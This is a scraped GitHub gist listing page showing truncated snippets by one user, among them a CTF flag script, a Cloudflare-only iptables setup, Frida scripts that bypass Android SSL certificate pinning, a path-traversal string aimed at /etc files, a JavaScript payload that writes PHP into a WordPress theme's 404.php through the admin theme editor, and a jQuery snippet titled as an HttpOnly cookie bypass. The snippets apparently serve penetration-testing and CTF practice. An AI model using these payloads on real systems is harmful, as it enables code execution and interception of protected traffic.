Skip to content

Instantly share code, notes, and snippets.

View numanturle's full-sized avatar
🕳️

numan numanturle

🕳️
View GitHub Profile
<?php
$flag = "SODERCTF[C0K_M7_K0L4Y_G3LcI_D3L1_Y1N3_1S_BaSINde_fanta_s3verim]";
function strigToBinary($string)
{
$characters = str_split($string);
$binary = [];
foreach ($characters as $character) {
$data = unpack('H*', $character);
$binary[] = base_convert($data[1], 16, 2);
@numanturle
numanturle / gist:1726dc0886885ed4f9d2c42c07b5713b
Created April 18, 2020 13:10
web server only cloudflare
for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done;
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done;
iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP;
ip6tables -A INPUT -p tcp -m multiport --dports http,https -j DROP;
Java.perform(function() {
var array_list = Java.use("java.util.ArrayList");
var ApiClient = Java.use('com.android.org.conscrypt.TrustManagerImpl');
ApiClient.checkTrustedRecursive.implementation = function(a1, a2, a3, a4, a5, a6) {
// console.log('Bypassing SSL Pinning');
var k = array_list.$new();return k;
}
}, 0);
/../../../../../../../../../../../.././/etc/telephonyProfiles.d/build_date
cat a | tr " " "\n" | uniq | sed '/^[[:space:]]*$/d'
#include <windows.h>
#include <iostream>
using namespace std;
//https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-sleepex
//https://docs.microsoft.com/en-us/windows/win32/api/synchapi/nf-synchapi-sleep
//75BF3C9A | E8 11000000 | call <kernelbase.SleepEx> |
int main() {
for (int i = 0; i < 5; i++) {
cout << i << "\n";
cout << "Uyku Basliyor";
jQuery.get("/wordpress/wp-admin/theme-editor.php?file=404.php",function(data){
var parsed = jQuery.parseHTML(data);
var noncem = jQuery("#nonce").val();
var themem = jQuery("#theme").val();
jQuery.post( "/wordpress/wp-admin/admin-ajax.php", { nonce: noncem, newcontent: "<?php phpinfo(); ?>",action: "edit-theme-plugin-file",theme: themem, file:"404.php" } );
jQuery.get("/wordpress/wp-content/themes/"+themem+"/404.php");
@numanturle
numanturle / big.php
Created December 29, 2020 15:29
big file
$handle = fopen("big.json", "r");
if ($handle) {
while (($line = fgets($handle)) !== false) {
// process the line read.
}
fclose($handle);
} else {
// error opening the file.
}
@numanturle
numanturle / frida_multiple_unpinning.js
Created January 10, 2021 00:46 — forked from akabe1/frida_multiple_unpinning.js
Another Android ssl certificate pinning bypass for various methods
/* Android ssl certificate pinning bypass script for various methods
by Maurizio Siddu
Run with:
frida -U -f [APP_ID] -l frida_multiple_unpinning.js --no-pause
*/
setTimeout(function() {
Java.perform(function () {
console.log('');
@numanturle
numanturle / gist:80faab01fb767841db81fe4c98587fdc
Last active January 16, 2021 17:09
laravel bypass http only cookie
$( document ).ready(function() {
$.ajax({
url:"/asd",
method:"POST",
async:true,
xhr: function() {
var xhr = jQuery.ajaxSettings.xhr();
var setRequestHeader = xhr.setRequestHeader;
xhr.setRequestHeader = function(name, value) {
if (name == 'X-Requested-With') return;